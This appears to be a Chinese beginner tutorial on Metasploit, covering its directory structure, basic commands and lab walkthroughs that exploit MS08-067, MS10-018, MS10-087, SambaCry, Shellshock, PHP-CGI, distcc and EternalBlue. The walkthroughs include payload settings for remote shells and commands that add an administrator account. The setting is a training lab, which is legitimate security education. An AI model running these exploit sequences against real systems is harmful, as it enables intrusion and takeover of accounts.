欢迎光临
我们一直在努力

MSF使用教程与基础实战运用(小白版)

MSF概述

Metasploit就是⼀个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是⼀个免 费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数 2000多个已知软件漏洞的专业级漏洞攻击⼯具

MSF⽬录结构解读

msf在kali虚拟机的存放⽬录:/usr/share/metasploit-framework/

Modules

Modules
:⽤户⽤到的各种模块⼏乎都在这⾥,⽤户使⽤use这个msf这⾥时,就是⽤到了这个⽬录下的模块。这个⽬录下的⽂件在msfconsole启动时会被⾃动加载的。

Auxiliary
:主要包含渗透
测试中⼀些辅助性的脚本,这些脚本功能有扫描,嗅探,破解,注⼊,漏洞挖掘等
Encoders
:各种编码⼯具 ⽤于躲过⼊侵检测和过滤系统。

Exploits
:主要包含了传说中的exp、0day、各种漏洞利⽤的脚本。主要的攻击代码全在这,这⾥边包含的exp的路径的命名规则是 系统/服务/模块,在使⽤exp是可以根据这个命名⽅法来找(也可以⽤search这条指令来找)。⽐如:use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名)

Nops
: NOP (No Operation or Next Operation) sled,由于IDS/IPS会检查数据包中不规则的数据,所以在某些场合下(⽐如针对溢出攻击),某些特殊的滑⾏字符串(NOPS x90x90…)则会因为被拦截⽽导致攻击失效,所以此时需要修改exploit中的NOPs.nops⽂件夹下的东⻄会在payload⽣成时⽤到(后⾯会有介绍)。⽐如我们打开php的NOPS⽣成脚本,就会发现它只是返回了指定⻓度的空格⽽已。

Payloads
:这个单词翻译过来叫载荷:是攻击者发送给系统执⾏的指令(不包含exploits攻击阶段),payloads主要是在⽬标机执⾏的,⽽exploits是在本地机执⾏作⽤于⽬标机。命名规则是: 系统/类型/名称 ⽐如: use payloads/windows/shell/bind_tcp
Post
: 这个⽬录⾥放着msf 的 exploits执⾏成功后,向⽬标机发送的⼀些功能性指令⽐如:提权,获取hash等。

Plugins

这⾥的模块⽤户需要使⽤load 来加载,提供数据库连接插件,和各种要⽤到的插件。

Scripts

这个⽬录下的⽂件⼤都是Meterpreter这个模块利⽤的脚本

Tools:

包含⼀些有⽤的脚本和零散的⼯具。

MSF基本命令

输入命令msfconsole启动

?                                        帮助命令

search 模块                         搜索你要找的模块

use 模块                              使用模块

back                                     从当前环境返回

connect IP地址 端口            连接⼀个主机的指定端口

info 模块                              显示⼀个或多个模块的信息

jobs                                     显示和管理作业(和windows任务管理器的进程作⽤⼀样)

quit&exit                              退出msf

MSF渗透测试

⽹络服务器攻击渗透(MS08-067)

1.msfconsole

2.use exploit/windows/smb/ms08_067_netapi

3.show options

4.set RHOST 192.168.244.7

5.run

6.shell

7.net user

8.net user test test /add

9.net user

10.net user test /del

漏洞技术原理

MS08-067详细原理:MS08-067漏洞原理及详尽分析过程 – FreeBuf网络安全行业门户https://www.freebuf.com/vuls/203881.html2019-6-1

浏览器攻击渗透(MS10-018)

1.msfconsole

2.use exploit/windows/browser/ms10_018_ie_behaviors

3.set SRVHOST 192.168.244.4

kali
⾃⼰的
ip

4.set PAYLOAD windows/meterpreter/bind_tcp

5.set LPORT 4441

6.exploit -j

7.#
等待靶机执⾏

8.jobs

9.sessions

10.sessions -i 1

11.shell

漏洞技术原理

MS10-018详细原理:
浏览器攻击渗透MS10-018-CSDN博客https://blog.csdn.net/weixin_47114294/article/details/146425289

应⽤软件格式渗透 利⽤word去渗透(MS10-087)

1.msfconsole

2.use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

3.set payload windows/exec

4.set CMD calc.exe

5.set FILENAME ceshi.rtf

6.run

漏洞技术原理

MS10-087详细原理:MS10_087漏洞学习研究 – 燃烧少年的心 – 博客园https://www.cnblogs.com/justforfun12/p/5333528.html

利⽤samba服务漏洞深入Linux主机(CVE-2017-7494)

1.#vuehub
上使⽤
root
执⾏

2.cd /home/enjoy/vulhub-master/samba/CVE-2017-7494

3.docker-compose up -d

4.#kali
执⾏

5.msfconsole

6.use exploit/linux/samba/is_known_pipename

7.set RHOSTS 192.168.244.6 (wubangtuip)

8.run

9.id

漏洞技术原理

CVE-2017-7494漏洞详细原理:【漏洞分析】Samba远程代码执行漏洞(CVE-2017-7494)-SambaCry分析报告https://www.suphp.cn/anquanke/81/86181.html

Bash Shellshock(破壳CVE-2014-6271)

1.#vuehub
上使⽤
root
执⾏

2.docker-compose down

3.cd /home/enjoy/vulhub-master/bash/shellshock

4.docker-compose build

5.docker-compose up -d

6.docker-compose config

7.#http://youip:8080/victim.cgi

8.#kali
执⾏

9.msfconsole

10.use exploit/multi/http/apache_mod_cgi_bash_env_exec

11.set RHOSTS 192.168.244.6 (vnt ip)

12.set RPORT 8080

13.set TARGETURI /victim.cgi

14.run

15.shell

16.id

漏洞技术原理

CVE-2014-6271漏洞详细原理:
CVE-2014-6271(shellshock破壳漏洞) – toby123 – 博客园https://www.cnblogs.com/huangxiaosan/p/14243502.html

PHP CGI漏洞利⽤(CVE-2012-1823)

1.#vuehub
上使⽤
root
执⾏

2.docker-compose down

3.cd /home/enjoy/vulhub-master/php/CVE-2012-1823

4.docker-compose build

5.docker-compose up -d

6.docker-compose config

7.#
环境启动后,访问
`http://your-ip:8080/`
可⻅
“Hello”
字样。

8.#
访问
`http://your-ip:8080/index.php?-s`
即爆出源码,说明漏洞存在。发送如下数据包,

9.可⻅
Body
中的代码已被执⾏:

10.#kali
执⾏

11.msfconsole

12.use exploit/multi/http/php_cgi_arg_injection

13.set RHOSTS 192.168.244.6 (vb ip)

14.set RPORT 8080

15.run

16.shell

17.id

漏洞技术原理

CVE-2012-1823漏洞详细原理:
PHP-CGI远程代码执行漏洞(CVE-2012-1823) – AllFalls – 博客园https://www.cnblogs.com/ForBreeze/articles/18045338

Distcc后⻔漏洞(CVE-2004-2678)

1.use exploit/unix/misc/distcc_exec

2.set payload cmd/unix/reverse_perl

3.set rhost 192.168.244.8 (ms ip) 192.168.153.137

4.set lhost 192.168.244.4 (kali
⾃⼰的
)192.168.153.132

5.exploit

run
也可以)

6.id

Metasploit永恒之蓝(ms17_010)

1.msfconsole

2.use exploit/windows/smb/ms17_010_eternalblue

3.set rhosts 192.168.209.129

4.set LHOST 0.0.0.0

5.set payload windows/x64/shell/bind_tcp

6.run

7.net user test test /add

8.net localgroup administrators test /add

9.net user

10.net user test /del

漏洞技术原理

MS17-010漏洞详细原理:
MS17-010 漏洞研究——免考课题 20155104 赵文昊 – 囚月 – 博客园https://www.cnblogs.com/Qujinkongyuyin/p/9266958.html

赞(0)
未经允许不得转载:171主机测评 » MSF使用教程与基础实战运用(小白版)
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址